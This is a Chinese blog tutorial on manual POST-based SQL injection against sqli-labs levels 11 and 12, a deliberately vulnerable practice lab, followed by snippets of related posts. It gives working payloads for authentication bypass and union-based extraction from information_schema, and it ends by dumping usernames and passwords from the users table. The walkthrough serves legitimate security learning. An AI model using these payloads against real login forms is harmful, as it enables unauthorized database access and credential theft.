(手工)【sqli-labs11-12】POST注入:基本步骤、示例

最新推荐文章于 2025-05-27 15:01:42 发布
最新推荐文章于 2025-05-27 15:01:42 发布
阅读量1.5k 收藏 11
点赞数 2
CC 4.0 BY-SA版权
分类专栏: # 【全】sqlil-abs靶场 文章标签: 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53079406/article/details/125655261

目录

推荐:

一、POST(手工)SQL注入基本步骤:

 2.1、第一步:判断是否存在SQL漏洞

2.2、第二步:判断字段数

2.3、第三步:判断回显点

2.4、第四步:查询当前数据库

2.5、第五步:查表名

2.6、第六步:查字段

2.7、第七步:查数据

二、Less11(POST-Error based - Single Quotes String)

2.1、简介:(错误-单引号)

第一步:判断注入点

第二步:分析注入方法

第三步:常规的获取数据步骤

爆数据:

三、Less12(POST-Error based - Double Quotes String-with twist)

3.1、简介:(错误-双引号)

推荐:

【SQL注入】POST注入:高危点、利用过程icon-default.png?t=M5H6https://blog.youkuaiyun.com/qq_53079406/article/details/125652873?spm=1001.2014.3001.5501

一、POST(手工)SQL注入基本步骤:

 2.1、第一步:判断是否存在SQL漏洞

在输入框中填入一些闭合的符号,看页面是否异常

如: ’        "          ')          ")

当页面发生错误,则证明闭合有效

有时单双引号闭合后,还要考虑括号个数

2.2、第二步:判断字段数

例如:

”)order by 3#

当回显正确的时候,就判断出字段数

2.3、第三步:判断回显点

使用union 联合查询找到回显点

例如:

") union select 1,2,3#

2.4、第四步:查询当前数据库

例如:

") union select 1,database(),3#

2.5、第五步:查表名

例如:

") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=“security” #

2.6、第六步:查字段

例如:

") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“users” #

2.7、第七步:查数据

例如:

")union select 1,username,password from users where id=2 #

二、Less11(POST-Error based - Single Quotes String)

2.1、简介:(错误-单引号)

请求方法:POST

方法:报错回显

分类:看我们是否找到账号名

在代码中,账号输入框和密码输入框是连着的

在第一个代码框最后注释掉后面内容后,就不需要输入密码了

第一步:判断注入点

输入了一个单引号显示错误,说明可能存在注入点,符号可能为单引号

第二步:分析注入方法

点击post date输入

uname=admin' and 1=1#

(或者在第一个框输入admin' and 1=1#  )

字符型注入

 

第三步:常规的获取数据步骤

执行其他读取修改数据等操作(常规操作了)

例如(报错回显)

admin' and 1=2 union select 1,database()# 

猜显示位数,获取数据库,获取表名,获取列名,获取数据

①uname=admin' and 1=2 union select 1,2 #

②uname=admin' and 1=2 union select 1,database() #

③uname=admin' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

④uname=admin' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

⑤uname=admin' and 1=2 union select 1,group_concat(username,password) from users #

爆数据:

admin' and 1=2 union select 1,group_concat(username,password) from users #

 

三、Less12(POST-Error based - Double Quotes String-with twist)

3.1、简介:(错误-双引号)

请求方法:POST

方法:报错回显

分类:看我们是否找到账号名

在代码中,账号输入框和密码输入框是连着的

在第一个代码框最后注释掉后面内容后,就不需要输入密码了

利用过程和Less11一样

POST注入
笔墨稠思
11-06 770
靶场地址 POST注入和GET注入几乎没有区别,只是GET注入在url上传参,而POST注入在FORM表单中传递参数。 首先,我们需要判断FORM表单是否存在sql注入: 这是一个登录表单,我采取了通用的登录方式 a’ or 1=1 发现登录成功,说明存在SQL注入 接下来我需要获取当前表的字段数来进行联合查询 用 order by 方法获取了当前表中有3个字段,之后判断回显点 通过联合查询 union select 1,2,3 发现会先点为2,3两字段位置,接下来就可以查询我们想要的内容了 查
mysql post手工注入_MySQL手工注入
weixin_34646207的博客
01-19 201
一些手工注入基础(以数字型为例,字符型需要单引号'闭合)1、oder byhttp://url?id=1+order+by+{num}num=n 正常num=n+1 错误2、联合查询http://url?id=1+union+select+1,2,3,......,n+--页面出现显示位:显示位3、爆破库名http://url?id=1+union+select+1,2,3,4,5,6,7,8,9...
sqli-labsPOST类型注入
weixin_45626840的博客
04-23 247
思路和前些关的联合注入一样,只不过payload构造和回显内容是通过抓包修改与查看
SQL 三种注入方式详解,(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-27 3168
MySQL 提供了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在服务器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
sqli-labs ————less -11POST注入
Fly_鹏程万里
05-11 4372
前言从这一关开始,我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以post的方式提交的服务器的,之后再由服务器端进行验证。Less-11关卡界面:我们首先提交一个admin试试看会有什么...
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 3152
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs第20关手工注入
04-01
好的,我现在需要处理用户关于sqli-labs第20关手工注入的问题。首先,我得回忆一下第20关的具体情况。根据之前的了解,sqli-labs的不同关卡设计不同的注入类型,比如GET型、POST型、报错注入、盲注等等。用户提到的...
sqli-labs使用sqlimap注入
04-03
### 如何使用 SQLMap 对 sqli-labs 进行 SQL 注入测试 #### 工具简介 SQLMap 是一款自动化的 SQL 注入工具,能够检测并利用多种类型的 SQL 注入漏洞。它支持各种数据库管理系统 (DBMS),并通过命令行参数实现灵活...
sqli-labs第七关sqlmap注入
03-28
好的,我现在需要帮用户解决sqli-labs第七关使用sqlmap进行SQL注入的问题。首先,我得回忆一下第七关的特点。第七关在sqli-labs中通常被称为“导出文件”或“堆叠注入”关卡,可能需要通过导出文件到服务器来获取...
post注入
我只会装360的博客
10-08 1026
先观察网站,发现有一个搜索框,输入1测试,页面并没有变化 通过查看请求头发现是post请求 在搜索框中输入1’报错,并返回报错语句 输入1‘# 页面正常,说明此处存在注入 搜索game、2018等字符发现页面没有变化,搜索到了结果但不显示 搜索其他字符使页面发生变化 )无变化 “无变化 ‘报错 因为页面不会发生变化,通过union 布尔查询没有用,使用延时查询进行注入 搜索’ and sl...
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 788
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
SQL注入---POST注入
zhoutong2323的博客
04-07 1718
Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
sqli-labs POST11-17)
半夜好饿的博客
05-09 331
      写在前面的话:今天比较空闲,把11-17给写了,18之后的是另外一种方式了,需要改包,遂单独作为一篇了。 LESS 11    由于是POST,与GET有一定的区别,不能直接在地址栏处构造playload,每次在输入框中构造有些难受,可以使用burpsuite或者火狐的hackbar。 在Username处输入admin’, ...
SQL注入post注入
banliyaoguai的博客
05-21 1515
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
SQL注入POST注入
weixin_43765321的博客
03-03 4008
1. POST请求介绍 1.1 POST消息头实例 1.2 POST请求介绍 POST方法起初是用来向服务器输入数据的 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交/文件上传等,请求会被包含在请求体中 POST方法可能会创建新的资源或修改现有资源 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 1.3 POST请求特点 POST请求不能被缓存下来 POST请求不会保存在浏览器
sqli 简单post注入
weixin_46164380的博客
02-21 220
判断当前数据库字段有几列; uname=admin' order by 2# &password=123 这个时候就出现了报错,表示字段只有两列。 uname=admin' order by 3# &password=123 判断当前用户与当前数据库 uname=admin' union select user(),database()# &password=123...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值